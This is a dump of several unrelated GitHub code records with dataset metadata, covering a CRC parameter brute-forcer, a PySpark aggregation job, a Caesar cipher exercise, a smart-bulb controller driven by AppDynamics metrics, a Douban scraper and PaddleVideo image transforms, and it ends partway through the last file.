_poly, data1, True, False, xorout) == crc1: # verify against sample 1\n if get_crc_value(i, _poly, data2, True, False, xorout) == crc2:\n _f = open('file/reverse_crc_2.txt', 'a', encoding='utf-8')\n _f.write(\"Polynomial: 0x{:02x}\\n\".format(_poly))\n _f.write(\"Initial value: 0x{:02x}\\n\".format(i))\n _f.write(\"Input reflected: True\\n\")\n _f.write(\"Output reflected: False\\n\")\n _f.write(\"Final XOR value: 0x{:02x}\\n\".format(xorout))\n _f.write(\"-*-*-*-*-*-*-\\n\")\n _f.close()\n\n\ndef reverse_crc_3(data1, data2, crc1, crc2):\n \"\"\"Recover the CRC polynomial and initial value from two data samples and their CRCs,\n input not reflected, output reflected\n \"\"\"\n for _poly in range(256): # polynomial range\n for i in range(256): # initial value range\n for xorout in range(256):\n if get_crc_value(i, _poly, data1, False, True, xorout) == crc1: # verify against sample 1\n if get_crc_value(i, _poly, data2, False, True, xorout) == crc2:\n _f = open('file/reverse_crc_3.txt', 'a', encoding='utf-8')\n _f.write(\"Polynomial: 0x{:02x}\\n\".format(_poly))\n _f.write(\"Initial value: 0x{:02x}\\n\".format(i))\n _f.write(\"Input reflected: False\\n\")\n _f.write(\"Output reflected: True\\n\")\n _f.write(\"Final XOR value: 0x{:02x}\\n\".format(xorout))\n _f.write(\"*-*-*-*-*-*-*\\n\")\n _f.close()\n\n\ndef reverse_crc_4(data1, data2, crc1, crc2):\n \"\"\"Recover the CRC polynomial and initial value from two data samples and their CRCs,\n input and output not reflected\n \"\"\"\n for _poly in range(256): # polynomial range\n for i in range(256): # initial value range\n for xorout in range(256):\n if get_crc_value(i, _poly, data1, False, False, xorout) == crc1: # verify against sample 1\n if get_crc_value(i, _poly, data2, False, False, xorout) == crc2:\n _f = open('file/reverse_crc_4.txt', 'a', encoding='utf-8')\n _f.write(\"Polynomial: 0x{:02x}\\n\".format(_poly))\n _f.write(\"Initial value: 0x{:02x}\\n\".format(i))\n _f.write(\"Input reflected: False\\n\")\n _f.write(\"Output reflected: False\\n\")\n _f.write(\"Final XOR value: 0x{:02x}\\n\".format(xorout))\n _f.write(\"*************\\n\")\n _f.close()\n\n\ndef handle_data():\n \"\"\"Read the CRC model parameters from user input\"\"\"\n refin2 = False\n refout2 = False\n init2 = int(input(\"c. Enter the initial value (hex): \"), 16)\n mark_in = input(\"Input reflection: 1. reflected; 2. not reflected: \")\n mark_out = input(\"Output reflection: 1. reflected; 2. not reflected: \")\n xorout2 = int(input(\"Enter the final XOR value (hex): \"), 16)\n\n check_data = input('a. Enter the data bytes to check (space separated): ')\n d = [int(i, 16) for i in check_data.split()]\n\n if mark_in == '1':\n refin2 = True\n elif mark_in == '2':\n refin2 = False\n else:\n print(\"Please enter 1 or 2\")\n if mark_out == '1':\n refout2 = True\n elif mark_out == '2':\n refout2 = False\n else:\n print(\"Please enter 1 or 2\")\n return init2, d, refin2, refout2, xorout2\n\n\nif __name__ == '__main__':\n multiprocessing.freeze_support()\n 
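# Brute-force note: each reverse_crc_* scans 256**3 = 16,777,216 (poly, init, xorout)\n # combinations for one reflection mode; the four processes below cover all four modes.\n 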
d1 = []\n d2 = []\n\n method = int(input('Select a function (1. check; 2. table lookup; 3. generate table; 4. reverse lookup): '))\n if method == 1 or method == 2 or method == 3:\n print('<-----collecting data----->')\n ploy = int(input(\"b. Enter the polynomial (hex): \"), 16)\n if method == 3:\n get_crctable_csv(create_crc_table(ploy))\n else:\n _init, d1, refin, refout, _xorout = handle_data()\n if method == 1:\n result = get_crc_value(_init, ploy, d1, refin, refout, _xorout)\n print('CRC value (forward check):', hex(result))\n if method == 2:\n table_method(create_crc_table(ploy), d1, _init, refin, refout, _xorout)\n\n elif method == 4:\n sel = int(input('Select the data entry mode (1. type hex data (incl. check byte, e.g. \\'37 40 04 00 00 00 1c e6\\'); 2. import a log): '))\n if sel == 1:\n d1, d2 = get_input_data()\n elif sel == 2:\n d1, d2 = get_log_data()\n else:\n print(\"Invalid input\")\n if not os.path.exists('file'):\n os.mkdir('file')\n\n args_t = (d1[:-1], d2[:-1], d1[-1], d2[-1],)\n\n # run the four reflection modes in parallel\n p1 = multiprocessing.Process(target=reverse_crc_1, args=args_t)\n p2 = multiprocessing.Process(target=reverse_crc_2, args=args_t)\n p3 = multiprocessing.Process(target=reverse_crc_3, args=args_t)\n p4 = multiprocessing.Process(target=reverse_crc_4, args=args_t)\n\n p1.start()\n p2.start()\n p3.start()\n p4.start()\n\n p1.join()\n p2.join()\n p3.join()\n p4.join()\n print(\"Matching finished; results saved to .txt files\")\n else:\n print(\"Invalid input\")\n\n os.system('pause') # keep the console window open\n","repo_name":"kindred-7/CRC-Kit","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":10865,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17524557429","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col,year,to_timestamp,month,dayofweek,date_format\n\n\nif __name__ == '__main__':\n spark = SparkSession.builder \\\n .appName(\"Assignment6thJan\") \\\n .master(\"local[*]\") \\\n .getOrCreate()\n df = spark.read.format('csv') \\\n .option('delimiter', ',') \\\n .option('header', 'True') \\\n .option('inferSchema', 'True') \\\n .load('file:///home/saif/LFS/datasets/txns')\n df = df.withColumn('txndate', to_timestamp(df[\"txndate\"], 'MM-dd-yyyy'))\n df1 = df.withColumn('year', year(df['txndate'])) \\\n .withColumn('month', month(df['txndate'])) \\\n .withColumn('day', date_format(df['txndate'], 'EEEE'))\n 
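# date_format(..., 'EEEE') yields the full weekday name (e.g. 'Monday'); the dayofweek\n # import above would instead give a 1-7 number and is unused here.\n 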
df2 = df1[\"txndate\", \"amount\"].groupby('txndate').sum()\n df2.write.option(\"header\", True) \\\n .mode(\"overwrite\") \\\n .json(\"hdfs://localhost:9000/user/saif/HFS/Output/df_op/txns_json\")","repo_name":"melwinmpk/Spark","sub_path":"pySpark_part2/assignment6thJan.py","file_name":"assignment6thJan.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72944196908","text":"# Created By: Abdullah Najeeb\n# Date: 10/14/2019\n'''\n\n\nimport random\n\ndef encryption(S, n):\n S.lower()\n alphabet = ('abcdefghijklmnopqrstuvwxyz')\n newString = ''\n for x in S:\n if x == ' ':\n newString+= ' '\n continue\n index = alphabet.find(x)\n index += n\n if index >= 26:\n index = 0 + index % 26\n newString += alphabet[index]\n newString += str(n)\n return newString\n\ndef decryption(W):\n count = 0\n for x in range(len(W)):\n if W[x].isdigit():\n var = W[x:]\n break\n count += 1\n var = int(var)\n var =- var\n string = W[0:count]\n decrypt = encryption(string, var)\n return decrypt[0:count]\n\ndef main():\n print(encryption('hello world', 1))\n print(decryption('ebiil tloia23'))\n randomSeed()\n\ndef randomSeed():\n random.seed(10)\n\n #Generate Random Number First Time\n var = random.randint(1, 27)\n first = encryption('hello world', var)\n print(first)\n print(decryption(first))\n\n #Generate Random Number Second Time\n randVar = random.randint(1, 27)\n second = encryption('computer science', randVar)\n print(second)\n print(decryption(second))\n\n #Generate Random Number Third Time\n randNum = random.randint(1, 27)\n third = encryption('abdullah najeeb', randNum)\n print(third)\n print(decryption(third))\n\n\n\nmain()\n\n'''\n\nimport turtle\n\nt = turtle.Turtle()\n\n\ndef drawRectangle(t, length, width, x, y, color, pensize, heading):\n \"\"\" t is a Turtle object. \"\"\"\n t.pensize(pensize)\n t.setheading(heading)\n t.penup()\n t.pendown()\n t.fillcolor(color)\n t.begin_fill()\n t.back(.5 * length)\n t.forward(length)\n t.left(90)\n t.forward(width)\n t.left(90)\n t.forward(length)\n t.left(90)\n t.forward(width)\n t.end_fill()\n t.setheading(0)\n\n\ndrawRectangle(t, 50, -50, 75, 15, \"green\", 45, 2)\ndrawRectangle(t, 0, 0, 30, 75, \"orange\", 0, 10)\ndrawRectangle(t, 100, 100, 25, 25, \"purple\", 75, 5)\nturtle.done()\n","repo_name":"anajee2/python-projects","sub_path":"Project 1.py","file_name":"Project 1.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3085070356","text":"# petmorri@cisco.com\n# change_bulb.py\t-\tthis file provides the functionality for changing the status of the bulb based on data pulled from AppD\n\nimport sys\nimport os\nimport uuid\nimport argparse\nimport requests\nimport time\nfrom pytradfri import Gateway\nfrom pytradfri.api.libcoap_api import APIFactory\nfrom pytradfri.error import PytradfriError\nfrom pytradfri.util import load_json, save_json\nfolder = os.path.dirname(os.path.abspath(__file__)) # noqa\nsys.path.insert(0, os.path.normpath(\"%s/..\" % folder)) # noqa\n\nCONFIG_FILE = 'tradfri_standalone_psk.conf'\n\n# Parse Tradfri credentials\nparser = argparse.ArgumentParser()\nparser.add_argument('host', metavar='IP', type=str,\n help='IP Address of your Tradfri gateway')\nparser.add_argument('-K', '--key', dest='key', required=False,\n help='Security code found on your Tradfri gateway')\nparser.add_argument('-S','--state', dest='set_state',required=False)\nargs = parser.parse_args()\n\nif args.host not in load_json(CONFIG_FILE) and args.key is None:\n print(\"Please provide the 'Security Code' on the back of your \"\n \"Tradfri gateway:\", end=\" \")\n key = input().strip()\n if len(key) != 16:\n raise PytradfriError(\"Invalid 'Security Code' provided.\")\n else:\n args.key = key\nif args.set_state is not None:\n set_state = args.set_state\n\n# Make a call to the AppDynamics API to get the current value of people in the room\ndef query_appd_metric():\n params=(('metric-path', 'Analytics|Cisco_Meraki_Camera average person count'),\n ('time-range-type', 'BEFORE_NOW'),\n ('duration-in-mins', '1'),\n ('output', 'json')\n )\n response = requests.get('https://hackathon-emea.saas.appdynamics.com/controller/rest/applications/AppDynamics%20Analytics-145/metric-data', params=params, auth=('USER', 'PASS'))\n pers_count_appd = response.json()[0]['metricValues'][0]['current']\n return pers_count_appd\n\n# Get lights, api objects\ndef init():\n conf = load_json(CONFIG_FILE)\n try:\n identity = conf[args.host].get('identity')\n psk = conf[args.host].get('key')\n api_factory = APIFactory(host=args.host, psk_id=identity, psk=psk)\n except KeyError:\n identity = uuid.uuid4().hex\n 
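# First-run pairing: register a fresh random identity with the gateway using the\n # security code (args.key); the returned PSK is cached in CONFIG_FILE for later runs.\n 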
api_factory = APIFactory(host=args.host, psk_id=identity)\n try:\n psk = api_factory.generate_psk(args.key)\n print('Generated PSK: ', psk)\n\n conf[args.host] = {'identity': identity,\n 'key': psk}\n save_json(CONFIG_FILE, conf)\n except AttributeError:\n raise PytradfriError(\"Please provide the 'Security Code' on the \"\n \"back of your Tradfri gateway using the \"\n \"-K flag.\")\n\n api = api_factory.request\n\n gateway = Gateway()\n\n devices_command = gateway.get_devices()\n devices_commands = api(devices_command)\n devices = api(devices_commands)\n\n lights = [dev for dev in devices if dev.has_light_control]\n return lights, api\n\ndef set_light(lights, api, myvalue):\n my_command = lights[0].light_control.set_dimmer(myvalue)\n api(my_command)\n\nlights, api = init()\non_off = (lights[0].light_control.lights[0].state)\ndim_state = (lights[0].light_control.lights[0].dimmer)\n\n# Loop and decide whether to dim the bulb, etc.\nwhile True:\n pers_count_appd = query_appd_metric()\n if pers_count_appd > 0 and not on_off:\n lights, api = init()\n set_light(lights, api, 128)\n last_state = 128\n on_off = True\n elif pers_count_appd == 0 and on_off:\n lights, api = init()\n set_light(lights, api, 0)\n on_off = False\n time.sleep(10)\n","repo_name":"CiscoSE/smarterspaces","sub_path":"tradfri/change_bulb.py","file_name":"change_bulb.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70694416747","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom bs4 import Tag\n\n# URL of the first page of the Douban Top 250 chart (the top 25 movies)\nurl = \"https://movie.douban.com/top250?start=0&filter=\"\n\n# Send the request, disguising the crawler as a browser via the \"User-Agent\" header\nresp = requests.get(url=url, headers={\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (\"\n \"KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 \"\n \"Edg/91.0.864.59\"})\n\n# Parse the response body\nsoup = BeautifulSoup(markup=resp.text, features=\"lxml\")\n\n# Locate the div tags with class 'hd'\ncontent_div_hd = soup.find_all(name=\"div\", class_=\"hd\") # type: list[Tag]\n\n# Take the Chinese title: the first span with class 'title'\ncontent_all = []\nfor div_hd in content_div_hd:\n content_all.append(\n div_hd.find_all(name=\"span\", class_=\"title\", limit=1)[0]\n )\n\n# Strip the html tags and surrounding whitespace to collect all the titles\ntitles = [content.text.strip() for content in content_all]\n\n# Check whether 怦然心动 (Flipped) is in the top 25\nif \"怦然心动\" in titles:\n print(\"怦然心动 is one of Douban's top 25 movies\")\n","repo_name":"cutelittletiantian/python-web-crawler","sub_path":"02-爬文字、反爬规避之用户代理伪装爬虫、批量方法/demo02-1爬豆瓣电影Top25找《怦然心动》.py","file_name":"demo02-1爬豆瓣电影Top25找《怦然心动》.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"19305189387","text":"import torch\nimport os.path as osp\n\nfrom data.dataset import FB15Dataset\nfrom dataloader import DataLoader\nfrom model import KBNet\n\n\ndef save_embeddings(run_dir, dataset):\n h_size = 200\n o_size = 200\n heads = 2\n margin = 1\n dev = 'cuda'\n\n data_loader = DataLoader(dataset)\n x, g, graph = data_loader.load_train(dev)\n edge_idx, edge_type = data_loader.graph2idx(graph, dev)\n\n # determine input size\n x_size = x.shape[1]\n g_size = g.shape[1]\n\n encoder = KBNet(x_size, g_size, h_size, o_size, heads, margin, device=dev)\n path = osp.join(run_dir, 'encoder.pt')\n model_dict = torch.load(path)\n encoder.load_state_dict(model_dict['model_state_dict'])\n\n encoder.eval()\n with torch.no_grad():\n h, g = encoder(x, g, edge_idx, edge_type)\n dataset.save_embedding(h, g)\n\n\nfb = 
FB15Dataset()\nrun_dir = './wandb/run-20200324_163404-ozrio67g/'\nsave_embeddings(run_dir, fb)\n","repo_name":"TraianVidrascu/DGAT","sub_path":"auxilary.py","file_name":"auxilary.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7012319723","text":"import math\nimport random\nfrom collections.abc import Sequence\n\nimport cv2\nimport numpy as np\nimport paddle\nimport paddle.nn.functional as F\nfrom PIL import Image\n\nfrom ..registry import PIPELINES\n\n\n@PIPELINES.register()\nclass Scale(object):\n \"\"\"\n Scale images.\n Args:\n short_size(float | int): Short size of an image will be scaled to the short_size.\n fixed_ratio(bool): Set whether to zoom according to a fixed ratio. default: True\n do_round(bool): Whether to round up when calculating the zoom ratio. default: False\n backend(str): Choose pillow or cv2 as the graphics processing backend. default: 'pillow'\n \"\"\"\n def __init__(self,\n short_size,\n fixed_ratio=True,\n keep_ratio=None,\n do_round=False,\n backend='pillow'):\n self.short_size = short_size\n assert (fixed_ratio and not keep_ratio) or (not fixed_ratio), \\\n f\"fixed_ratio and keep_ratio cannot be true at the same time\"\n self.fixed_ratio = fixed_ratio\n self.keep_ratio = keep_ratio\n self.do_round = do_round\n\n assert backend in [\n 'pillow', 'cv2'\n ], f\"Scale's backend must be pillow or cv2, but get {backend}\"\n self.backend = backend\n\n def __call__(self, results):\n \"\"\"\n Performs resize operations.\n Args:\n imgs (Sequence[PIL.Image]): List where each item is a PIL.Image.\n For example, [PIL.Image0, PIL.Image1, PIL.Image2, ...]\n return:\n resized_imgs: List where each item is a PIL.Image after scaling.\n \"\"\"\n imgs = results['imgs']\n resized_imgs = []\n for i in range(len(imgs)):\n img = imgs[i]\n if isinstance(img, np.ndarray):\n h, w, _ = img.shape\n elif isinstance(img, Image.Image):\n w, h = img.size\n else:\n raise NotImplementedError\n\n if w <= h:\n ow = self.short_size\n if self.fixed_ratio:\n oh = int(self.short_size * 4.0 / 3.0)\n elif not self.keep_ratio: # no\n oh = self.short_size\n else:\n scale_factor = self.short_size / w\n oh = int(h * float(scale_factor) +\n 0.5) if self.do_round else int(h *\n self.short_size / w)\n ow = int(w * float(scale_factor) +\n 0.5) if self.do_round else int(w *\n self.short_size / h)\n else:\n oh = self.short_size\n if self.fixed_ratio:\n ow = int(self.short_size * 4.0 / 3.0)\n elif not self.keep_ratio: # no\n ow = self.short_size\n else:\n scale_factor = self.short_size / h\n oh = int(h * float(scale_factor) +\n 0.5) if self.do_round else int(h *\n self.short_size / w)\n ow = int(w * float(scale_factor) +\n 0.5) if self.do_round else int(w *\n self.short_size / h)\n if self.backend == 'pillow':\n resized_imgs.append(img.resize((ow, oh), Image.BILINEAR))\n elif self.backend == 'cv2' and (self.keep_ratio is not None):\n resized_imgs.append(\n cv2.resize(img, (ow, oh), interpolation=cv2.INTER_LINEAR))\n else:\n resized_imgs.append(\n Image.fromarray(\n cv2.resize(np.asarray(img), (ow, oh),\n interpolation=cv2.INTER_LINEAR)))\n results['imgs'] = resized_imgs\n return results\n\n\n@PIPELINES.register()\nclass RandomCrop(object):\n \"\"\"\n Random crop images.\n Args:\n target_size(int): Random crop a square with the target_size from an image.\n \"\"\"\n def __init__(self, target_size):\n self.target_size = target_size\n\n def __call__(self, results):\n \"\"\"\n Performs random crop operations.\n 
Args:\n imgs: List where each item is a PIL.Image.\n For example, [PIL.Image0, PIL.Image1, PIL.Image2, ...]\n return:\n crop_imgs: List where each item is a PIL.Image after random crop.\n \"\"\"\n imgs = results['imgs']\n if 'backend' in results and results['backend'] == 'pyav': # [c,t,h,w]\n h, w = imgs.shape[2:]\n else:\n w, h = imgs[0].size\n th, tw = self.target_size, self.target_size\n\n assert (w >= self.target_size) and (h >= self.target_size), \\\n \"image width({}) and height({}) should be larger than crop size\".format(\n w, h, self.target_size)\n\n crop_images = []\n if 'backend' in results and results['backend'] == 'pyav':\n x1 = np.random.randint(0, w - tw)\n y1 = np.random.randint(0, h - th)\n crop_images = imgs[:, :, y1:y1 + th, x1:x1 + tw] # [C, T, th, tw]\n else:\n x1 = random.randint(0, w - tw)\n y1 = random.randint(0, h - th)\n for img in imgs:\n if w == tw and h == th:\n crop_images.append(img)\n else:\n crop_images.append(img.crop((x1, y1, x1 + tw, y1 + th)))\n results['imgs'] = crop_images\n return results\n\n\n@PIPELINES.register()\nclass RandomResizedCrop(RandomCrop):\n def __init__(self,\n area_range=(0.08, 1.0),\n aspect_ratio_range=(3 / 4, 4 / 3),\n target_size=224,\n backend='cv2'):\n\n self.area_range = area_range\n self.aspect_ratio_range = aspect_ratio_range\n self.target_size = target_size\n self.backend = backend\n\n @staticmethod\n def get_crop_bbox(img_shape,\n area_range,\n aspect_ratio_range,\n max_attempts=10):\n\n assert 0 < area_range[0] <= area_range[1] <= 1\n assert 0 < aspect_ratio_range[0] <= aspect_ratio_range[1]\n\n img_h, img_w = img_shape\n area = img_h * img_w\n\n min_ar, max_ar = aspect_ratio_range\n aspect_ratios = np.exp(\n np.random.uniform(np.log(min_ar), np.log(max_ar),\n size=max_attempts))\n target_areas = np.random.uniform(*area_range, size=max_attempts) * area\n candidate_crop_w = np.round(np.sqrt(target_areas *\n aspect_ratios)).astype(np.int32)\n candidate_crop_h = np.round(np.sqrt(target_areas /\n aspect_ratios)).astype(np.int32)\n\n for i in range(max_attempts):\n crop_w = candidate_crop_w[i]\n crop_h = candidate_crop_h[i]\n if crop_h <= img_h and crop_w <= img_w:\n x_offset = random.randint(0, img_w - crop_w)\n y_offset = random.randint(0, img_h - crop_h)\n return x_offset, y_offset, x_offset + crop_w, y_offset + crop_h\n\n # Fallback\n crop_size = min(img_h, img_w)\n x_offset = (img_w - crop_size) // 2\n y_offset = (img_h - crop_size) // 2\n return x_offset, y_offset, x_offset + crop_size, y_offset + crop_size\n\n def __call__(self, results):\n imgs = results['imgs']\n if self.backend == 'pillow':\n img_w, img_h = imgs[0].size\n elif self.backend == 'cv2':\n img_h, img_w, _ = imgs[0].shape\n elif self.backend == 'pyav':\n img_h, img_w = imgs.shape[2:] # [cthw]\n else:\n raise NotImplementedError\n\n left, top, right, bottom = self.get_crop_bbox(\n (img_h, img_w), self.area_range, self.aspect_ratio_range)\n\n if self.backend == 'pillow':\n img_w, img_h = imgs[0].size\n imgs = [img.crop((left, top, right, bottom)) for img in imgs]\n elif self.backend == 'cv2':\n img_h, img_w, _ = imgs[0].shape\n imgs = [img[top:bottom, left:right] for img in imgs]\n elif self.backend == 'pyav':\n img_h, img_w = imgs.shape[2:] # [cthw]\n imgs = imgs[:, :, top:bottom, left:right]\n else:\n raise NotImplementedError\n results['imgs'] = imgs\n return results\n\n\n@PIPELINES.register()\nclass CenterCrop(object):\n \"\"\"\n Center crop images.\n Args:\n target_size(int): Center crop a square with the target_size from an image.\n do_round(bool): Whether 
to round up the coordinates of the upper left corner of the cropping area. default: True\n \"\"\"\n def __init__(self, target_size, do_round=True, backend='pillow'):\n self.target_size = target_size\n self.do_round = do_round\n self.backend = backend\n\n def __call__(self, results):\n \"\"\"\n Performs Center crop operations.\n Args:\n imgs: List where each item is a PIL.Image.\n For example, [PIL.Image0, PIL.Image1, PIL.Image2, ...]\n return:\n ccrop_imgs: List where each item is a PIL.Image after Center crop.\n \"\"\"\n imgs = results['imgs']\n ccrop_imgs = []\n th, tw = self.target_size, self.target_size\n if isinstance(imgs, paddle.Tensor):\n h, w = imgs.shape[-2:]\n x1 = int(round((w - tw) / 2.0)) if self.do_round else (w - tw) // 2\n y1 = int(round((h - th) / 2.0)) if self.do_round else (h - th) // 2\n ccrop_imgs = imgs[:, :, y1:y1 + th, x1:x1 + tw]\n else:\n for img in imgs:\n if self.backend == 'pillow':\n w, h = img.size\n elif self.backend == 'cv2':\n h, w, _ = img.shape\n else:\n raise NotImplementedError\n assert (w >= self.target_size) and (h >= self.target_size), \\\n \"image width({}) and height({}) should be larger than crop size\".format(\n w, h, self.target_size)\n x1 = int(round(\n (w - tw) / 2.0)) if self.do_round else (w - tw) // 2\n y1 = int(round(\n (h - th) / 2.0)) if self.do_round else (h - th) // 2\n if self.backend == 'cv2':\n ccrop_imgs.append(img[y1:y1 + th, x1:x1 + tw])\n elif self.backend == 'pillow':\n ccrop_imgs.append(img.crop((x1, y1, x1 + tw, y1 + th)))\n results['imgs'] = ccrop_imgs\n return results\n\n\n@PIPELINES.register()\nclass MultiScaleCrop(object):\n \"\"\"\n Random-crop images with multiscale sizes\n Args:\n target_size(int): Random crop a square with the target_size from an image.\n scales(int): List of candidate cropping scales.\n max_distort(int): Maximum allowable deformation combination distance.\n fix_crop(int): Whether to fix the cutting start point.\n allow_duplication(int): Whether to allow duplicate candidate crop starting points.\n more_fix_crop(int): Whether to allow more cutting starting points.\n \"\"\"\n def __init__(\n self,\n target_size, # NOTE: named target size now, but still pass short size in it!\n scales=None,\n max_distort=1,\n fix_crop=True,\n allow_duplication=False,\n more_fix_crop=True,\n backend='pillow'):\n\n self.target_size = target_size\n self.scales = scales if scales else [1, .875, .75, .66]\n self.max_distort = max_distort\n self.fix_crop = fix_crop\n self.allow_duplication = allow_duplication\n self.more_fix_crop = more_fix_crop\n assert backend in [\n 'pillow', 'cv2'\n ], f\"MultiScaleCrop's backend must be pillow or cv2, but get {backend}\"\n self.backend = backend\n\n def __call__(self, results):\n \"\"\"\n Performs MultiScaleCrop operations.\n Args:\n imgs: List where each item is a PIL.Image.\n XXX:\n results:\n\n \"\"\"\n imgs = results['imgs']\n\n input_size = [self.target_size, self.target_size]\n\n im_size = imgs[0].size\n\n # get random crop offset\n def _sample_crop_size(im_size):\n image_w, image_h = im_size[0], im_size[1]\n\n base_size = min(image_w, image_h)\n crop_sizes = [int(base_size * x) for x in self.scales]\n crop_h = [\n input_size[1] if abs(x - input_size[1]) < 3 else x\n for x in crop_sizes\n ]\n crop_w = [\n input_size[0] if abs(x - input_size[0]) < 3 else x\n for x in crop_sizes\n ]\n\n pairs = []\n for i, h in enumerate(crop_h):\n for j, w in enumerate(crop_w):\n if abs(i - j) <= self.max_distort:\n pairs.append((w, h))\n crop_pair = random.choice(pairs)\n if not 
self.fix_crop:\n w_offset = random.randint(0, image_w - crop_pair[0])\n h_offset = random.randint(0, image_h - crop_pair[1])\n else:\n w_step = (image_w - crop_pair[0]) / 4\n h_step = (image_h - crop_pair[1]) / 4\n\n ret = list()\n ret.append((0, 0)) # upper left\n if self.allow_duplication or w_step != 0:\n ret.append((4 * w_step, 0)) # upper right\n if self.allow_duplication or h_step != 0:\n ret.append((0, 4 * h_step)) # lower left\n if self.allow_duplication or (h_step != 0 and w_step != 0):\n ret.append((4 * w_step, 4 * h_step)) # lower right\n if self.allow_duplication or (h_step != 0 or w_step != 0):\n ret.append((2 * w_step, 2 * h_step)) # center\n\n if self.more_fix_crop:\n ret.append((0, 2 * h_step)) # center left\n ret.append((4 * w_step, 2 * h_step)) # center right\n ret.append((2 * w_step, 4 * h_step)) # lower center\n ret.append((2 * w_step, 0 * h_step)) # upper center\n\n ret.append((1 * w_step, 1 * h_step)) # upper left quarter\n ret.append((3 * w_step, 1 * h_step)) # upper right quarter\n ret.append((1 * w_step, 3 * h_step)) # lower left quarter\n ret.append((3 * w_step, 3 * h_step)) # lower righ quarter\n\n w_offset, h_offset = random.choice(ret)\n\n return crop_pair[0], crop_pair[1], w_offset, h_offset\n\n crop_w, crop_h, offset_w, offset_h = _sample_crop_size(im_size)\n crop_img_group = [\n img.crop((offset_w, offset_h, offset_w + crop_w, offset_h + crop_h))\n for img in imgs\n ]\n if self.backend == 'pillow':\n ret_img_group = [\n img.resize((input_size[0], input_size[1]), Image.BILINEAR)\n for img in crop_img_group\n ]\n else:\n ret_img_group = [\n Image.fromarray(\n cv2.resize(np.asarray(img),\n dsize=(input_size[0], input_size[1]),\n interpolation=cv2.INTER_LINEAR))\n for img in crop_img_group\n ]\n results['imgs'] = ret_img_group\n return results\n\n\n@PIPELINES.register()\nclass RandomFlip(object):\n \"\"\"\n Random Flip images.\n Args:\n p(float): Random flip images with the probability p.\n \"\"\"\n def __init__(self, p=0.5):\n self.p = p\n\n def __call__(self, results):\n \"\"\"\n Performs random flip operations.\n Args:\n imgs: List where each item is a PIL.Image.\n For example, [PIL.Image0, PIL.Image1, PIL.Image2, ...]\n return:\n flip_imgs: List where each item is a PIL.Image after random flip.\n \"\"\"\n imgs = results['imgs']\n v = random.random()\n if v < self.p:\n if isinstance(imgs, paddle.Tensor):\n results['imgs'] = paddle.flip(imgs, axis=[3])\n elif isinstance(imgs[0], np.ndarray):\n results['imgs'] = [cv2.flip(img, 1, img) for img in imgs\n ] # [[h,w,c], [h,w,c], ..., [h,w,c]]\n else:\n results['imgs'] = [\n img.transpose(Image.FLIP_LEFT_RIGHT) for img in imgs\n ]\n else:\n results['imgs'] = imgs\n return results\n\n\n@PIPELINES.register()\nclass Image2Array(object):\n \"\"\"\n transfer PIL.Image to Numpy array and transpose dimensions from 'dhwc' to 'dchw'.\n Args:\n transpose: whether to transpose or not, default True, False for slowfast.\n \"\"\"\n def __init__(self, transpose=True, data_format='tchw'):\n assert data_format in [\n 'tchw', 'cthw'\n ], f\"Target format must in ['tchw', 'cthw'], but got {data_format}\"\n self.transpose = transpose\n self.data_format = data_format\n\n def __call__(self, results):\n \"\"\"\n Performs Image to NumpyArray operations.\n Args:\n imgs: List where each item is a PIL.Image.\n For example, [PIL.Image0, PIL.Image1, PIL.Image2, ...]\n return:\n np_imgs: Numpy array.\n \"\"\"\n imgs = results['imgs']\n if 'backend' in results and results[\n 'backend'] == 'pyav': # [T,H,W,C] in [0, 1]\n if self.transpose:\n if 
self.data_format == 'tchw':\n t_imgs = imgs.transpose((0, 3, 1, 2)) # tchw\n else:\n t_imgs = imgs.transpose((3, 0, 1, 2)) # cthw\n results['imgs'] = t_imgs\n else:\n t_imgs = np.stack(imgs).astype('float32')\n if self.transpose:\n if self.data_format == 'tchw':\n t_imgs = t_imgs.transpose(0, 3, 1, 2) # tchw\n else:\n t_imgs = t_imgs.transpose(3, 0, 1, 2) # cthw\n results['imgs'] = t_imgs\n return results\n\n\n@PIPELINES.register()\nclass Normalization(object):\n \"\"\"\n Normalization.\n Args:\n mean(Sequence[float]): mean values of different channels.\n std(Sequence[float]): std values of different channels.\n tensor_shape(list): size of mean, default [3,1,1]. For slowfast, [1,1,1,3]\n \"\"\"\n def __init__(self, mean, std, tensor_shape=[3, 1, 1], inplace=False):\n if not isinstance(mean, Sequence):\n raise TypeError(\n f'Mean must be list, tuple or np.ndarray, but got {type(mean)}')\n if not isinstance(std, Sequence):\n raise TypeError(\n f'Std must be list, tuple or np.ndarray, but got {type(std)}')\n\n self.inplace = inplace\n if not inplace:\n self.mean = np.array(mean).reshape(tensor_shape).astype(np.float32)\n self.std = np.array(std).reshape(tensor_shape).astype(np.float32)\n else:\n self.mean = np.array(mean, dtype=np.float32)\n self.std = np.array(std, dtype=np.float32)\n\n def __call__(self, results):\n \"\"\"\n Performs normalization operations.\n Args:\n imgs: Numpy array.\n return:\n np_imgs: Numpy array after normalization.\n \"\"\"\n if self.inplace:\n n = len(results['imgs'])\n h, w, c = results['imgs'][0].shape\n norm_imgs = np.empty((n, h, w, c), dtype=np.float32)\n for i, img in enumerate(results['imgs']):\n norm_imgs[i] = img\n\n for img in norm_imgs: # [n,h,w,c]\n mean = np.float64(self.mean.reshape(1, -1)) # [1, 3]\n stdinv = 1 / np.float64(self.std.reshape(1, -1)) # [1, 3]\n cv2.subtract(img, mean, img)\n cv2.multiply(img, stdinv, img)\n else:\n imgs = results['imgs']\n norm_imgs = imgs / 255.0\n norm_imgs -= self.mean\n norm_imgs /= self.std\n if 'backend' 